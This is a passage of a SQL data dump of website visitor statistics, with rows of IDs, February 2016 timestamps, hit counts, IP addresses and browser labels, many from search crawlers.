6.249.69.11',''),(583,1454910149,1,1,0,0,'130.193.51.29','other'),(584,1454910150,2,0,2,0,'66.249.69.3',''),(585,1454912479,1,1,0,0,'78.111.185.29','msie'),(586,1454912881,1,0,1,0,'68.180.229.232',''),(587,1454912921,1,0,1,0,'66.249.69.11',''),(588,1454913013,1,1,0,0,'37.53.74.49','msie'),(589,1454914011,1,1,0,0,'66.249.91.4','other'),(590,1454914262,1,1,0,0,'141.8.142.76','other'),(591,1454914939,1,1,0,0,'94.179.102.7','chrome'),(592,1454915022,1,0,1,0,'68.180.229.232',''),(593,1454915077,13,0,13,0,'66.249.69.124',''),(594,1454915105,1,1,0,0,'217.69.136.207','other'),(595,1454915449,3,0,3,0,'66.249.69.11',''),(596,1454915508,1,1,0,0,'66.249.93.90','firefox'),(597,1454915561,1,1,0,0,'213.174.7.19','chrome'),(598,1454915793,2,2,0,0,'213.174.7.17','firefox'),(599,1454915872,1,1,0,0,'94.179.42.243','chrome'),(600,1454915978,10,0,10,0,'66.249.69.124',''),(601,1454916018,2,0,2,0,'66.249.69.94',''),(602,1454916158,1,1,0,0,'5.255.253.95','other'),(603,1454916371,6,6,0,0,'157.55.39.246','other'),(604,1454916376,7,7,0,0,'157.55.39.136','other'),(605,1454916389,13,13,0,0,'40.77.167.50','other'),(606,1454916402,11,11,0,0,'157.55.39.91','other'),(607,1454916664,8,0,8,0,'66.249.69.3',''),(608,1454916918,2,0,2,0,'66.249.69.124',''),(609,1454916947,1,1,0,0,'212.111.198.100','chrome'),(610,1454916978,1,1,0,0,'217.69.136.207','other'),(611,1454916997,1,0,1,0,'66.249.69.11',''),(612,1454917398,1,0,1,0,'66.249.69.110',''),(613,1454917496,1,0,1,0,'66.249.69.94',''),(614,1454917604,1,0,1,0,'66.249.69.3',''),(615,1454917750,48,48,0,0,'82.193.127.15','other'),(616,1454917849,1,0,1,0,'66.249.69.124',''),(617,1454918734,1,1,0,0,'94.179.42.243','chrome'),(618,1454918850,1,1,0,0,'5.255.253.95','other'),(619,1454918924,1,1,0,0,'213.174.7.29','firefox'),(620,1454918995,2,0,2,0,'66.249.69.11',''),(621,1454919110,1,1,0,0,'213.174.7.17','firefox'),(622,1454919241,1,1,0,0,'8.29.198.26','other'),(623,1454919513,1,1,0,0,'95.132.60.76','firefox'),(624,1454919684,1,1,0,0,'141.8.142.76','other'),(625,1454919688,1,1,0,0,'130.193.51.29','other'),(626,1454919692,3,3,0,0,'141.8.132.45','other'),(627,1454919697,4,4,0,0,'5.255.253.99','other'),(628,1454919736,2,2,0,0,'94.179.42.243','chrome'),(629,1454919922,1,0,1,0,'66.249.69.3',''),(630,1454919950,2,0,2,0,'66.249.69.124',''),(631,1454920074,1,1,0,0,'92.112.85.224','firefox'),(632,1454920126,20,20,0,0,'141.8.184.18','other'),(633,1454920134,1,1,0,0,'141.8.132.10','other'),(634,1454920176,9,9,0,0,'184.168.46.118','firefox'),(635,1454920229,2,2,0,0,'93.158.152.8','other'),(636,1454920233,1,1,0,0,'130.193.51.59','other'),(637,1454920238,1,1,0,0,'93.158.152.58','other'),(638,1454920246,1,1,0,0,'130.193.50.7','other'),(639,1454920250,1,1,0,0,'93.158.152.46','other'),(640,1454920254,1,1,0,0,'141.8.142.50','other'),(641,1454920259,1,1,0,0,'178.154.189.26','other'),(642,1454920263,1,1,0,0,'93.158.152.44','other'),(643,1454920268,1,1,0,0,'5.255.253.24','other'),(644,1454920360,1,1,0,0,'5.255.253.30','other'),(645,1454920364,1,1,0,0,'141.8.184.29','other'),(646,1454920387,1,1,0,0,'91.196.179.33','firefox'),(647,1454920709,1,1,0,0,'213.180.206.205','other'),(648,1454920803,1,1,0,0,'91.196.178.10','firefox'),(649,1454920964,1,0,1,0,'66.249.69.124',''),(650,1454921213,1,1,0,0,'178.154.189.17','other'),(651,1454921661,1,1,0,0,'141.8.142.35','other'),(652,1454921685,3,0,3,0,'66.249.69.3',''),(653,1454921711,1,1,0,0,'178.151.143.163','other'),(654,1454921716,1,1,0,0,'198.27.66.66','other'),(655,1454921806,1,1,0,0,'141.8.184.18','other'),(656,1454922031,1,1,0,0,'213.174.7.17','firefox'),(657,1454922764,1,1,0,0,'5.255.253.95','other'),(658,1454922896,1,1,0,0,'213.174.7.30','chrome'),(659,1454923067,1,1,0,0,'213.174.7.8','chrome'),(660,1454923242,1,0,1,0,'66.249.69.11',''),(661,1454923348,2,2,0,0,'141.8.132.10','other'),(662,1454923352,3,3,0,0,'93.158.152.5','other'),(663,1454923357,2,2,0,0,'141.8.132.71','other'),(664,1454923361,1,1,0,0,'93.158.152.14','other'),(665,1454923365,2,2,0,0,'141.8.142.76','other'),(666,1454923370,2,2,0,0,'93.158.152.75','other'),(667,1454923374,1,1,0,0,'93.158.152.64','other'),(668,1454923379,3,3,0,0,'141.8.184.18','other'),(669,1454923384,2,2,0,0,'141.8.132.52','other'),(670,1454923392,1,1,0,0,'93.158.152.76','other'),(671,1454923396,2,2,0,0,'141.8.142.40','other'),(672,1454923401,2,2,0,0,'141.8.132.34','other'),(673,1454923405,1,1,0,0,'130.193.37.18','other'),(674,1454923409,1,1,0,0,'130.193.51.29','other'),(675,1454923414,2,2,0,0,'141.8.184.29','other'),(676,1454923418,3,3,0,0,'130.193.51.17','other'),(677,1454923427,3,3,0,0,'130.193.51.26','other'),(678,1454923431,1,1,0,0,'5.255.253.103','other'),(679,1454923449,1,1,0,0,'93.158.152.47','other'),(680,1454923453,1,1,0,0,'141.8.142.12','other'),(681,1454923462,1,1,0,0,'5.255.253.94','other'),(682,1454923471,1,1,0,0,'93.158.152.46','other'),(683,1454923497,1,1,0,0,'5.255.253.121','other'),(684,1454923501,1,1,0,0,'5.255.253.89','other'),(685,1454923505,1,1,0,0,'93.158.152.8','other'),(686,1454923515,1,1,0,0,'5.255.253.80','other'),(687,1454923518,1,1,0,0,'141.8.183.1','other'),(688,1454923580,1,1,0,0,'213.174.7.21','firefox'),(689,1454923722,1,0,1,0,'66.249.69.3',''),(690,1454923804,1,1,0,0,'101.226.168.245','chrome'),(691,1454924281,2,0,2,0,'66.249.69.11',''),(692,1454924491,1,1,0,0,'66.249.91.63','other'),(693,1454924809,2,0,2,0,'66.249.69.3',''),(694,1454924877,1,1,0,0,'141.8.132.34','other'),(695,1454925025,1,0,1,0,'66.249.69.124',''),(696,1454925071,1,0,1,0,'68.180.229.232',''),(697,1454925295,2,2,0,0,'141.8.184.18','other'),(698,1454925361,1,1,0,0,'213.174.7.36','firefox'),(699,1454926250,2,0,2,0,'66.249.69.3',''),(700,1454927002,1,0,1,0,'66.249.69.11',''),(701,1454927198,3,3,0,0,'5.255.253.95','other'),(702,1454927202,2,2,0,0,'5.255.253.99','other'),(703,1454927221,1,1,0,0,'178.154.189.17','other'),(704,1454927332,1,1,0,0,'101.226.167.243','chrome'),(705,1454927376,1,1,0,0,'213.174.7.19','firefox'),(706,1454927733,1,1,0,0,'157.55.39.91','other'),(707,1454928571,2,0,2,0,'66.249.69.3',''),(708,1454928603,1,1,0,0,'66.102.9.94','firefox'),(709,1454928775,3,0,3,0,'68.180.229.232',''),(710,1454929538,1,1,0,0,'141.8.184.18','other'),(711,1454929543,8,8,0,0,'5.255.253.95','other'),(712,1454929548,5,5,0,0,'5.255.253.99','other'),(713,1454929972,2,0,2,0,'66.249.69.124',''),(714,1454930050,1,1,0,0,'8.29.198.26','other'),(715,1454930491,1,0,1,0,'66.249.69.102',''),(716,1454930903,1,0,1,0,'66.249.69.124',''),(717,1454931020,1,1,0,0,'94.179.94.183','firefox'),(718,1454931336,1,1,0,0,'93.158.152.58','other'),(719,1454931877,1,1,0,0,'95.132.82.222','firefox'),(720,1454932107,1,0,1,0,'66.249.69.11',''),(721,1454932140,1,0,1,0,'66.249.69.3',''),(722,1454932277,1,1,0,0,'93.73.35.185','chrome'),(723,1454932766,2,2,0,0,'213.174.7.17','firefox'),(724,1454932871,1,1,0,0,'213.174.7.19','firefox'),(725,1454933587,1,0,1,0,'66.249.69.11',''),(726,1454933757,1,1,0,0,'157.55.39.246','other'),(727,1454933782,1,0,1,0,'66.249.69.124',''),(728,1454933869,1,1,0,0,'213.174.7.17','firefox'),(729,1454934567,1,1,0,0,'85.115.62.180','other'),(730,1454934793,3,3,0,0,'82.193.127.15','other'),(731,1454934806,1,1,0,0,'91.90.10.63','firefox'),(732,1454935161,1,1,0,0,'66.249.91.4','other'),(733,1454935241,1,0,1,0,'66.249.69.3',''),(734,1454935373,1,1,0,0,'78.111.190.98','firefox'),(735,1454935469,1,1,0,0,'78.111.190.240','msie'),(736,1454935701,1,1,0,0,'213.174.7.99','firefox'),(737,1454936073,1,1,0,0,'62.210.215.100','chrome'),(738,1454936574,1,0,1,0,'68.180.229.232',''),(739,1454936737,1,1,0,0,'94.179.119.247','firefox'),(740,1454936797,1,1,0,0,'46.165.223.217','chrome'),(741,1454936866,1,1,0,0,'109.163.234.8','chrome'),(742,1454937175,1,1,0,0,'91.196.178.39','chrome'),(743,1454937711,1,1,0,0,'91.196.178.16','chrome'),(744,1454937780,1,1,0,0,'5.255.253.23','other'),(745,1454937784,1,1,0,0,'93.158.152.46','other'),(746,1454937792,1,1,0,0,'130.193.51.38','other'),(747,1454937797,1,1,0,0,'130.193.51.26','other'),(748,1454937801,1,1,0,0,'141.8.132.101','other'),(749,1454937806,1,1,0,0,'5.255.253.121','other'),(750,1454938006,1,1,0,0,'46.201.240.112','firefox'),(751,1454938381,1,0,1,0,'68.180.229.232',''),(752,1454938676,2,2,0,0,'94.179.119.247','firefox'),(753,1454939126,1,0,1,0,'66.249.69.11',''),(754,1454939696,1,1,0,0,'94.179.119.247','firefox'),(755,1454939772,1,1,0,0,'213.174.7.19','firefox'),(756,1454940119,1,1,0,0,'178.92.152.47','chrome'),(757,1454940270,1,1,0,0,'91.216.22.245','chrome'),(758,1454940440,1,0,1,0,'68.180.229.232',''),(759,1454940865,1,1,0,0,'8.29.198.26','other'),(760,1454940990,1,1,0,0,'78.111.185.99','chrome'),(761,1454941135,1,0,1,0,'66.249.69.124',''),(762,1454941298,1,1,0,0,'94.231.188.10','firefox'),(763,1454941349,1,0,1,0,'68.180.229.232',''),(764,1454941456,1,1,0,0,'94.179.119.247','firefox'),(765,1454941509,1,1,0,0,'213.174.7.19','firefox'),(766,1454942162,1,1,0,0,'213.174.7.17','firefox'),(767,1454942667,3,0,3,0,'68.180.229.232',''),(768,1454942885,1,1,0,0,'95.132.15.102','chrome'),(769,1454942979,1,1,0,0,'94.179.119.247','firefox'),(770,1454943603,2,0,2,0,'68.180.229.232',''),(771,1454944853,1,0,1,0,'66.249.69.124',''),(772,1454945243,1,0,1,0,'68.180.229.232',''),(773,1454945367,1,1,0,0,'46.107.228.180','firefox'),(774,1454945530,1,1,0,0,'95.134.116.114','chrome'),(775,1454945691,1,1,0,0,'141.8.184.29','other'),(776,1454945695,1,1,0,0,'141.8.142.50','other'),(777,1454945700,1,1,0,0,'141.8.132.10','other'),(778,1454945704,1,1,0,0,'93.158.152.14','other'),(779,1454945709,1,1,0,0,'130.193.51.26','other'),(780,1454945762,1,1,0,0,'66.249.91.63','other'),(781,1454946005,1,1,0,0,'5.255.253.103','other'),(782,1454946009,1,1,0,0,'178.154.189.17','other'),(783,1454946014,1,1,0,0,'141.8.184.18','other'),(784,1454947059,1,0,1,0,'68.180.229.232',''),(785,1454947839,1,1,0,0,'130.193.51.38','other'),(786,1454949347,2,2,0,0,'82.207.91.234','firefox'),(787,1454949537,1,1,0,0,'37.54.114.56','firefox'),(788,1454950213,1,0,1,0,'68.180.229.232',''),(789,1454950625,1,1,0,0,'46.174.126.136','chrome'),(790,1454950910,1,0,1,0,'66.249.69.11',''),(791,1454951510,1,1,0,0,'5.255.253.30','other'),(792,1454951519,2,2,0,0,'141.8.183.22','other'),(793,1454951524,1,1,0,0,'93.158.152.53','other'),(794,1454951528,1,1,0,0,'178.154.189.17','other'),(795,1454951537,1,1,0,0,'141.8.183.1','other'),(796,1454951739,1,1,0,0,'8.29.198.26','other'),(797,1454951864,2,0,2,0,'68.180.229.232',''),(798,1454952662,1,0,1,0,'66.249.69.11',''),(799,1454952725,1,1,0,0,'213.174.7.20','firefox'),(800,1454952939,1,0,1,0,'66.249.69.124',''),(801,1454953803,1,1,0,0,'37.53.231.2','chrome'),(802,1454954693,1,1,0,0,'62.210.215.100','chrome'),(803,1454954694,1,1,0,0,'5.39.1.52','chrome'),(804,1454955163,1,1,0,0,'93.158.152.53','other'),(805,1454955188,1,1,0,0,'93.171.65.188','other'),(806,1454955288,1,1,0,0,'188.239.21.206','chrome'),(807,1454955587,1,1,0,0,'91.196.178.34','firefox'),(808,1454955771,1,0,1,0,'66.249.69.124',''),(809,1454956016,1,0,1,0,'68.180.229.232',''),(810,1454956018,1,1,0,0,'141.8.132.45','other'),(811,1454956022,1,1,0,0,'93.158.152.64','other'),(812,1454956027,1,1,0,0,'130.193.37.18','other'),(813,1454956180,1,1,0,0,'66.249.91.8','other'),(814,1454956514,1,1,0,0,'91.196.178.10','firefox'),(815,1454957002,1,1,0,0,'213.174.7.28','chrome'),(816,1454957227,1,1,0,0,'178.94.172.142','chrome'),(817,1454957233,2,0,2,0,'68.180.229.232',''),(818,1454958025,1,1,0,0,'157.55.39.107','other'),(819,1454958239,1,0,1,0,'66.249.69.3',''),(820,1454958304,2,2,0,0,'37.54.114.56','firefox'),(821,1454958419,2,2,0,0,'93.158.152.64','other'),(822,1454958423,1,1,0,0,'178.154.189.26','other'),(823,1454958429,1,1,0,0,'141.8.183.1','other'),(824,1454958439,1,1,0,0,'130.193.51.29','other'),(825,1454958444,1,1,0,0,'5.255.253.80','other'),(826,1454958448,1,1,0,0,'130.193.51.26','other'),(827,1454958452,1,1,0,0,'93.158.152.53','other'),(828,1454958457,1,1,0,0,'141.8.132.71','other'),(829,1454958461,1,1,0,0,'93.158.152.5','other'),(830,1454958466,1,1,0,0,'93.158.152.14','other'),(831,1454958470,1,1,0,0,'141.8.142.76','other'),(832,1454958474,1,1,0,0,'93.158.152.75','other'),(833,1454958483,1,1,0,0,'5.255.253.86','other'),(834,1454958495,1,1,0,0,'178.154.189.17','other'),(835,1454958506,1,1,0,0,'141.8.132.10','other'),(836,1454958510,1,1,0,0,'141.8.184.29','other'),(837,1454958515,1,1,0,0,'93.158.152.44','other'),(838,1454958520,1,1,0,0,'141.8.142.35','other'),(839,1454958523,1,1,0,0,'93.158.152.47','other'),(840,1454959107,1,0,1,0,'66.249.69.124',''),(841,1454959381,2,0,2,0,'66.249.69.11',''),(842,1454959925,1,1,0,0,'37.54.114.56','firefox'),(843,1454960581,1,1,0,0,'93.158.152.8','other'),(844,1454960642,1,0,1,0,'68.180.229.232',''),(845,1454960744,1,0,1,0,'66.249.69.94',''),(846,1454961100,1,1,0,0,'37.54.114.56','firefox'),(847,1454961619,20,20,0,0,'109.87.138.56','other'),(848,1454962560,1,1,0,0,'8.29.198.25','other'),(849,1454962615,1,1,0,0,'130.193.50.7','other'),(850,1454962618,1,1,0,0,'141.8.132.34','other'),(851,1454962623,2,2,0,0,'178.154.189.17','other'),(852,1454962627,1,1,0,0,'141.8.184.18','other'),(853,1454962911,1,1,0,0,'157.55.39.91','other'),(854,1454963554,1,1,0,0,'192.99.107.187','other'),(855,1454964016,1,1,0,0,'91.196.177.69','chrome'),(856,1454964111,1,1,0,0,'141.8.132.101','other'),(857,1454965211,1,1,0,0,'5.255.253.6','other'),(858,1454965220,1,1,0,0,'141.8.132.101','other'),(859,1454966132,1,0,1,0,'68.180.229.232',''),(860,1454966401,1,1,0,0,'178.92.65.48','other'),(861,1454966892,1,0,1,0,'66.249.69.124',''),(862,1454967131,1,1,0,0,'66.249.91.8','other'),(863,1454967193,2,0,2,0,'68.180.229.232',''),(864,1454967795,1,1,0,0,'91.196.178.11','chrome'),(865,1454967932,1,1,0,0,'217.69.136.209','other'),(866,1454968052,4,4,0,0,'62.210.148.246','other'),(867,1454968089,1,0,1,0,'66.249.69.11',''),(868,1454969883,1,0,1,0,'66.249.69.3',''),(869,1454970166,4,0,4,0,'66.249.69.11',''),(870,1454970315,1,0,1,0,'66.249.69.124',''),(871,1454970327,11,11,0,0,'157.55.39.91','other'),(872,1454970338,6,6,0,0,'157.55.39.246','other'),(873,1454970350,13,13,0,0,'157.55.39.107','other'),(874,1454970357,7,7,0,0,'157.55.39.136','other'),(875,1454970487,1,1,0,0,'130.193.51.17','other'),(876,1454970755,1,1,0,0,'93.158.152.8','other'),(877,1454971494,1,1,0,0,'174.129.237.157','other'),(878,1454971528,1,0,1,0,'66.249.75.77',''),(879,1454971570,1,1,0,0,'217.69.136.208','other'),(880,1454971894,4,4,0,0,'87.255.90.68','firefox'),(881,1454972072,1,1,0,0,'62.210.215.100','chrome'),(882,1454972693,2,2,0,0,'130.193.51.26','other'),(883,1454973281,1,1,0,0,'141.8.132.52','other'),(884,1454973372,1,1,0,0,'8.29.198.25','other'),(885,1454973771,1,1,0,0,'180.76.15.154','other'),(886,1454974294,1,0,1,0,'68.180.229.232',''),(887,1454974467,1,1,0,0,'217.69.136.210','other'),(888,1454977013,1,1,0,0,'178.154.189.17','other'),(889,1454977164,1,0,1,0,'66.249.69.124',''),(890,1454977620,1,1,0,0,'66.249.91.63','other'),(891,1454978286,1,1,0,0,'51.254.215.143','other'),(892,1454978715,1,0,1,0,'66.249.69.11',''),(893,1454978806,1,1,0,0,'89.163.148.58','other'),(894,1454978877,1,0,1,0,'68.180.229.232',''),(895,1454979414,1,1,0,0,'93.158.152.8','other'),(896,1454979419,1,1,0,0,'93.158.152.53','other'),(897,1454979713,1,0,1,0,'66.249.69.11',''),(898,1454979759,1,1,0,0,'94.73.159.66','firefox'),(899,1454979932,2,0,2,0,'68.180.229.232',''),(900,1454980523,1,1,0,0,'180.76.15.14','other'),(901,1454980722,1,0,1,0,'66.249.69.124',''),(902,1454981215,1,1,0,0,'93.158.152.44','other'),(903,1454981219,1,1,0,0,'93.158.152.46','other'),(904,1454981459,1,1,0,0,'141.8.132.10','other'),(905,1454982191,3,3,0,0,'80.91.162.99','other'),(906,1454982802,1,1,0,0,'130.193.51.29','other'),(907,1454982807,1,1,0,0,'141.8.142.50','other'),(908,1454982811,1,1,0,0,'141.8.132.10','other'),(909,1454982934,7,7,0,0,'157.55.39.136','other'),(910,1454982939,6,6,0,0,'157.55.39.212','other'),(911,1454982947,11,11,0,0,'157.55.39.91','other'),(912,1454982958,13,13,0,0,'157.55.39.107','other'),(913,1454983383,2,0,2,0,'66.249.69.124',''),(914,1454983412,7,7,0,0,'82.193.127.15','other'),(915,1454984180,1,1,0,0,'8.29.198.25','other'),(916,1454984993,1,0,1,0,'66.249.75.93',''),(917,1454985155,2,2,0,0,'141.8.132.10','other'),(918,1454985160,1,1,0,0,'141.8.184.18','other'),(919,1454985168,1,1,0,0,'130.193.51.29','other'),(920,1454985593,1,0,1,0,'66.249.69.124',''),(921,1454986507,1,1,0,0,'141.8.142.35','other'),(922,1454986511,1,1,0,0,'141.8.142.50','other'),(923,1454986515,2,2,0,0,'93.158.152.44','other'),(924,1454986523,1,1,0,0,'93.158.152.8','other'),(925,1454987398,1,0,1,0,'66.249.69.3',''),(926,1454987632,1,0,1,0,'66.249.69.124',''),(927,1454988060,1,1,0,0,'66.249.91.8','other'),(928,1454988887,1,1,0,0,'62.210.215.100','chrome'),(929,1454989057,1,1,0,0,'141.8.132.71','other'),(930,1454989060,2,2,0,0,'141.8.132.45','other'),(931,1454989064,1,1,0,0,'141.8.183.1','other'),(932,1454989072,1,1,0,0,'130.193.51.17','other'),(933,1454989159,1,0,1,0,'66.249.69.11',''),(934,1454989168,1,1,0,0,'141.8.184.18','other'),(935,1454989179,1,1,0,0,'130.193.51.26','other'),(936,1454989183,1,1,0,0,'93.158.152.75','other'),(937,1454991138,1,1,0,0,'93.158.152.46','other'),(938,1454991142,1,1,0,0,'141.8.142.35','other'),(939,1454991146,2,2,0,0,'141.8.184.18','other'),(940,1454991150,3,3,0,0,'51.255.48.153','other'),(942,1454991154,1,1,0,0,'141.8.132.45','other'),(943,1454992528,8,8,0,0,'141.8.142.50','other'),(944,1454992533,8,8,0,0,'178.154.189.17','other'),(945,1454992704,5,5,0,0,'141.8.132.34','other'),(946,1454992708,8,8,0,0,'178.154.189.26','other'),(947,1454992712,9,9,0,0,'93.158.152.44','other'),(948,1454992724,6,6,0,0,'130.193.37.18','other'),(949,1454992732,6,6,0,0,'141.8.132.10','other'),(950,1454992736,8,8,0,0,'141.8.132.45','other'),(951,1454992740,5,5,0,0,'141.8.142.35','other'),(952,1454992748,7,7,0,0,'141.8.184.18','other'),(953,1454992752,6,6,0,0,'130.193.50.7','other'),(954,1454992761,6,6,0,0,'93.158.152.8','other'),(955,1454992769,5,5,0,0,'93.158.152.46','other'),(956,1454993007,1,1,0,0,'5.255.253.80','other'),(957,1454993032,1,1,0,0,'130.193.51.29','other'),(958,1454993100,1,0,1,0,'66.249.69.11',''),(959,1454993327,1,0,1,0,'66.249.69.124',''),(960,1454993497,1,1,0,0,'82.145.210.14','other'),(961,1454994710,1,1,0,0,'89.111.191.206','other'),(962,1454994973,1,1,0,0,'217.69.136.207','other'),(963,1454994988,1,1,0,0,'8.29.198.26','other'),(964,1454995012,1,1,0,0,'178.95.159.196','chrome'),(965,1454996700,1,1,0,0,'130.193.50.7','other'),(966,1454996747,1,1,0,0,'66.102.9.84','firefox'),(967,1454997834,1,1,0,0,'213.174.7.52','chrome'),(968,1454998172,1,1,0,0,'40.77.167.19','other'),(969,1454998350,1,1,0,0,'66.249.91.4','other'),(970,1454998395,1,1,0,0,'213.174.7.17','firefox'),(971,1454998418,1,1,0,0,'141.8.142.35','other'),(972,1454998424,2,2,0,0,'130.193.50.7','other'),(973,1454998427,1,1,0,0,'130.193.37.18','other'),(974,1454999150,1,1,0,0,'178.154.189.17','other'),(975,1454999692,1,1,0,0,'213.174.7.17','firefox'),(976,1454999837,1,1,0,0,'212.111.198.100','chrome'),(977,1454999984,1,1,0,0,'66.249.93.90','firefox'),(978,1455000383,2,2,0,0,'80.91.162.99','other'),(979,1455000576,1,1,0,0,'94.179.119.247','firefox'),(980,1455000697,1,1,0,0,'193.239.59.251','other'),(981,1455001137,1,1,0,0,'94.179.53.252','chrome'),(982,1455001151,1,1,0,0,'213.174.7.21','firefox'),(983,1455001385,1,1,0,0,'37.55.68.167','chrome'),(984,1455002006,5,5,0,0,'82.193.127.15','other'),(985,1455002123,2,0,2,0,'68.180.229.232',''),(986,1455002674,1,1,0,0,'213.174.7.21','firefox'),(987,1455002689,1,1,0,0,'95.133.6.6','chrome'),(988,1455004980,1,1,0,0,'136.243.155.85','other'),(989,1455005019,1,1,0,0,'78.111.190.176','firefox'),(990,1455005156,1,1,0,0,'180.76.15.158','other'),(991,1455005699,1,1,0,0,'213.174.7.17','firefox'),(992,1455005808,1,1,0,0,'8.29.198.26','other'),(993,1455005857,2,2,0,0,'213.174.7.19','firefox'),(994,1455006004,1,1,0,0,'217.69.136.207','other'),(995,1455006894,2,2,0,0,'78.111.190.176','firefox'),(996,1455007175,1,1,0,0,'93.73.233.151','firefox'),(997,1455007238,1,1,0,0,'217.69.136.208','other'),(998,1455007271,2,0,2,0,'68.180.229.232',''),(999,1455007565,1,1,0,0,'178.154.189.26','other'),(1000,1455007569,1,1,0,0,'141.8.142.35','other'),(1001,1455007589,1,1,0,0,'62.210.215.100','chrome'),(1002,1455009089,1,1,0,0,'213.174.7.33','firefox'),(1003,1455009200,1,1,0,0,'66.249.91.63','other'),(1004,1455009570,1,1,0,0,'78.111.190.58','chrome'),(1005,1455010166,1,1,0,0,'178.92.248.101','chrome'),(1006,1455010762,1,1,0,0,'213.174.7.23','msie'),(1007,1455010767,1,1,0,0,'213.174.7.23','chrome'),(1008,1455011016,1,0,1,0,'66.249.69.3',''),(1009,1455011076,1,1,0,0,'178.92.248.101','chrome'),(1010,1455011337,1,0,1,0,'68.180.229.232',''),(1011,1455012599,1,1,0,0,'46.201.240.112','firefox'),(1012,1455013549,1,1,0,0,'141.0.14.12','other'),(1013,1455013764,1,1,0,0,'213.174.7.52','chrome'),(1014,1455014433,1,1,0,0,'213.174.7.21','chrome'),(1015,1455015062,1,1,0,0,'194.44.40.82','firefox'),(1016,1455015300,1,1,0,0,'141.8.132.10','other'),(1017,1455015304,1,1,0,0,'93.158.152.44','other'),(1018,1455015349,1,0,1,0,'68.180.229.232',''),(1019,1455016631,1,1,0,0,'8.29.198.26','other'),(1020,1455017282,1,1,0,0,'95.25.57.107','chrome'),(1022,1455017283,1,1,0,0,'77.37.223.15','chrome'),(1023,1455017284,1,1,0,0,'46.39.230.216','chrome'),(1025,1455017464,1,1,0,0,'217.69.136.205','other'),(1026,1455017807,2,2,0,0,'93.158.152.8','other'),(1027,1455017811,2,2,0,0,'141.8.132.34','other'),(1028,1455017815,1,1,0,0,'130.193.37.18','other'),(1029,1455017907,1,0,1,0,'66.249.69.11',''),(1030,1455017962,1,1,0,0,'130.193.51.59','other'),(1031,1455018219,1,1,0,0,'217.69.136.207','other'),(1032,1455018220,1,1,0,0,'217.69.136.204','other'),(1033,1455019103,1,1,0,0,'195.225.144.88','chrome'),(1034,1455019803,1,1,0,0,'213.174.7.22','firefox'),(1035,1455019915,1,0,1,0,'68.180.229.232',''),(1036,1455020059,1,1,0,0,'93.158.152.8','other'),(1037,1455020378,1,1,0,0,'138.201.16.80','other'),(1038,1455020580,1,1,0,0,'66.249.91.63','other'),(1039,1455020659,1,1,0,0,'213.174.7.16','chrome'),(1040,1455021589,4,4,0,0,'200.87.46.206','other'),(1041,1455021592,2,2,0,0,'200.87.46.206','firefox'),(1042,1455022111,1,1,0,0,'195.225.144.88','chrome'),(1043,1455022429,1,1,0,0,'130.193.51.38','other'),(1044,1455022430,1,1,0,0,'5.255.253.95','other'),(1045,1455023112,1,1,0,0,'5.255.253.82','other'),(1046,1455023114,1,1,0,0,'141.8.184.18','other'),(1047,1455023115,2,2,0,0,'93.158.152.44','other'),(1048,1455023116,1,1,0,0,'130.193.51.17','other'),(1049,1455023276,1,1,0,0,'91.214.19.237','firefox'),(1050,1455023806,2,2,0,0,'130.193.51.29','other'),(1052,1455023807,1,1,0,0,'130.193.51.26','other'),(1053,1455023808,1,1,0,0,'93.158.152.53','other'),(1054,1455023809,1,1,0,0,'93.158.152.14','other'),(1056,1455023810,1,1,0,0,'141.8.132.10','other'),(1057,1455023811,2,2,0,0,'93.158.152.8','other'),(1058,1455023814,1,1,0,0,'141.8.142.50','other'),(1059,1455024623,1,0,1,0,'66.249.69.3',''),(1060,1455024626,1,1,0,0,'130.193.37.18','other'),(1061,1455024652,1,0,1,0,'66.249.69.124',''),(1062,1455024727,2,0,2,0,'66.249.69.11',''),(1063,1455025453,3,3,0,0,'130.193.51.26','other'),(1064,1455025454,2,2,0,0,'141.8.132.45','other'),(1065,1455025455,3,3,0,0,'141.8.132.34','other'),(1066,1455025466,3,3,0,0,'141.8.184.29','other'),(1067,1455025467,1,1,0,0,'141.8.132.71','other'),(1068,1455025468,4,4,0,0,'5.255.253.99','other'),(1070,1455025469,1,1,0,0,'93.158.152.44','other'),(1071,1455025471,2,2,0,0,'93.158.152.5','other'),(1072,1455025472,1,1,0,0,'141.8.183.23','other'),(1074,1455025473,1,1,0,0,'178.154.189.26','other'),(1075,1455025474,1,1,0,0,'130.193.51.29','other'),(1076,1455025475,1,1,0,0,'5.255.253.124','other'),(1077,1455025670,2,2,0,0,'141.8.132.52','other'),(1078,1455025671,2,2,0,0,'141.8.142.76','other'),(1079,1455025673,3,3,0,0,'93.158.152.8','other'),(1081,1455025674,1,1,0,0,'5.255.253.80','other'),(1082,1455025675,2,2,0,0,'93.158.152.53','other'),(1083,1455025679,1,1,0,0,'130.193.37.18','other'),(1084,1455025680,1,1,0,0,'141.8.183.1','other'),(1085,1455025685,1,1,0,0,'5.255.253.24','other'),(1086,1455025856,1,1,0,0,'180.76.15.155','other'),(1087,1455025944,1,1,0,0,'92.112.15.247','firefox'),(1088,1455026252,1,1,0,0,'217.69.136.203','other'),(1089,1455026562,1,1,0,0,'94.179.20.116','chrome'),(1090,1455026671,1,1,0,0,'94.179.75.125','chrome'),(1091,1455026882,2,2,0,0,'200.87.46.206','other'),(1092,1455026884,1,1,0,0,'200.87.46.206','firefox'),(1093,1455027001,1,1,0,0,'93.158.152.46','other'),(1094,1455027311,2,0,2,0,'66.249.69.3',''),(1095,1455027372,1,1,0,0,'213.174.7.17','firefox'),(1096,1455027451,1,1,0,0,'8.29.198.25','other'),(1097,1455027637,1,1,0,0,'37.53.89.22','chrome'),(1098,1455027743,1,1,0,0,'213.174.7.19','chrome'),(1099,1455028026,1,0,1,0,'66.249.69.11',''),(1100,1455028143,3,3,0,0,'93.158.152.53','other'),(1101,1455028144,2,2,0,0,'5.255.253.99','other'),(1102,1455028260,2,2,0,0,'93.158.152.44','other'),(1103,1455028261,2,2,0,0,'130.193.51.29','other'),(1104,1455028262,1,1,0,0,'5.255.253.80','other'),(1106,1455028263,1,1,0,0,'5.255.253.124','other'),(1107,1455028264,2,2,0,0,'93.158.152.5','other'),(1108,1455028265,1,1,0,0,'141.8.142.76','other'),(1110,1455028267,3,3,0,0,'141.8.132.10','other'),(1111,1455028269,1,1,0,0,'141.8.132.45','other'),(1113,1455028270,2,2,0,0,'141.8.132.34','other'),(1114,1455028271,2,2,0,0,'130.193.37.18','other'),(1115,1455028272,1,1,0,0,'141.8.132.52','other'),(1116,1455028273,2,2,0,0,'130.193.51.26','other'),(1117,1455028274,1,1,0,0,'93.158.152.14','other'),(1118,1455028275,1,1,0,0,'5.255.253.95','other'),(1119,1455028276,1,1,0,0,'93.158.152.8','other'),(1120,1455028